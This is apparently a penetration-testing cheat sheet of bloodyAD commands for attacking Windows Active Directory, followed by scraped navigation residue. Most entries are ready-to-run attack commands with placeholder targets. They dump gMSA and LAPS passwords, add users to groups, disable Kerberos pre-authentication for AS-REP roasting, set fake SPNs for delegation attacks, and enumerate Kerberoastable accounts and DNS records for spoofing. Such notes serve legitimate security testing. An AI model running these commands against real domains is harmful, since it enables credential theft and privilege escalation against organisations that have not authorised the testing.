BloodyAD

Link: https://github.com/CravateRouge/bloodyAD

Guide: https://github.com/CravateRouge/bloodyAD/wiki/User-Guide

Usage:

1)

bloodyAD --host dc01.DOMAIN.COM -d "DOMAIN.COM" --dc-ip DC_IP -k get object 'GMSA01$' --attr msDS-ManagedPassword

(Dump GMSA Password)

2)

bloodyAD --host dc01.DOMAIN.COM -d "DOMAIN.COM" --dc-ip DC_IP -k add groupMember "TARGET_GROUP" "USER_TO_ADD"

(Add a user to a group)

3)

bloodyAD --host dc01.DOMAIN.COM -d "DOMAIN.COM" --dc-ip DC_IP -k add uac TARGET_USER -f DONT_REQ_PREAUTH

(Disable pre-authentication on a user to do ASREPRoasting attack)

4)

bloodyAD --host dc01.DOMAIN.COM -d "DOMAIN.COM" --dc-ip DC_IP -k remove uac TARGET_USER -f ACCOUNTDISABLE

(Enable accounts)

5)

bloodyAD --host dc01.DOMAIN.COM -d "DOMAIN.COM" --dc-ip DC_IP -k set object "SVC_ACCOUNT" servicePrincipalName  -v "cifs/fake"

(Set a fake SPN for an account to do Constrained Delegation attack)

6)

bloodyAD -u USERNAME -p 'PASSWORD' -d DOMAIN.COM --host dc01.DOMAIN.COM get search --filter '(&(samAccountType=805306368)(servicePrincipalName=*))' --attr sAMAccountName | grep sAMAccountName | cut -d ' ' -f 2

(Get Kerberoastable accounts)

7)

bloodyAD -u USERNAME -p 'PASSWORD' -d DOMAIN.COM --host dc01.DOMAIN.COM get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName

(Get account that do not require Kerberos pre-authentication (AS-REP))

8)

bloodyAD -u USERNAME -p 'PASSWORD' -d DOMAIN.COM --host dc01.DOMAIN.COM get dnsDump | sed -n '/[^\n]*\*/,/^$/p'

(Check if ADIDNS has a wildcard entry (if not, check ADIDNS spoofing))

9)

bloodyAD -u USERNAME -p 'PASSWORD' -d DOMAIN.COM --host dc01.DOMAIN.COM get dnsDump

(Get all DNS Records from AD)

10)

bloodyAD -u USERNAME -p 'PASSWORD' -d DOMAIN.COM --host dc01.DOMAIN.COM get object 'DC=DOMAIN,DC=COM' --attr ms-DS-MachineAccountQuota

(Get Machine Account Quota (MAQ) to do an RBCD attack if the num is 10)

11)

bloodyAD -u USERNAME -p 'PASSWORD' -d DOMAIN.COM --host dc01.DOMAIN.COM get children --otype useronly

(Get all users)

12)

bloodyAD -u USERNAME -p 'PASSWORD' -d DOMAIN.COM --host dc01.DOMAIN.COM get children --otype computer

(Get all computers)

13)

bloodyAD -u USERNAME -p 'PASSWORD' -d DOMAIN.COM --host dc01.DOMAIN.COM get children --otype container

(Get all containers)

14)

bloodyAD -u USERNAME -p 'PASSWORD' -d DOMAIN.COM --host dc01.DOMAIN.COM get children --otype trustedDomain

(Get all trusts)

15)

bloodyAD -u USERNAME -p 'PASSWORD' -d DOMAIN.COM --host dc01.DOMAIN.COM get object 'DC=DOMAIN,DC=COM' --attr minPwdLength

(Get min Password Length)

16)

bloodyAD -u USERNAME -p 'PASSWORD' -d DOMAIN.COM --host dc01.DOMAIN.COM get object 'DC=DOMAIN,DC=COM' --attr msDS-Behavior-Version

(Get AD Forest level)

17)

bloodyAD -u USERNAME -d DOMAIN.COM -p PASSWORD --host dc01.DOMAIN.COM get object 'COMPUTER$' --attr ms-Mcs-AdmPwd

(Dump LAPS Password)

PreviousExploitation NextExploitation with Powerview

Last updated 8 months ago

hashtagLink: https://github.com/CravateRouge/bloodyAD

hashtagGuide: https://github.com/CravateRouge/bloodyAD/wiki/User-Guide

hashtagUsage:

hashtag1)

hashtag2)

hashtag3)

hashtag4)

hashtag5)

hashtag6)

hashtag7)

hashtag8)

hashtag9)

hashtag10)

hashtag11)

hashtag12)

hashtag13)

hashtag14)

hashtag15)

hashtag16)

hashtag17)

Link: https://github.com/CravateRouge/bloodyAD

Guide: https://github.com/CravateRouge/bloodyAD/wiki/User-Guide

Usage:

1)

2)

3)

4)

5)

6)

7)

8)

9)

10)

11)

12)

13)

14)

15)

16)

17)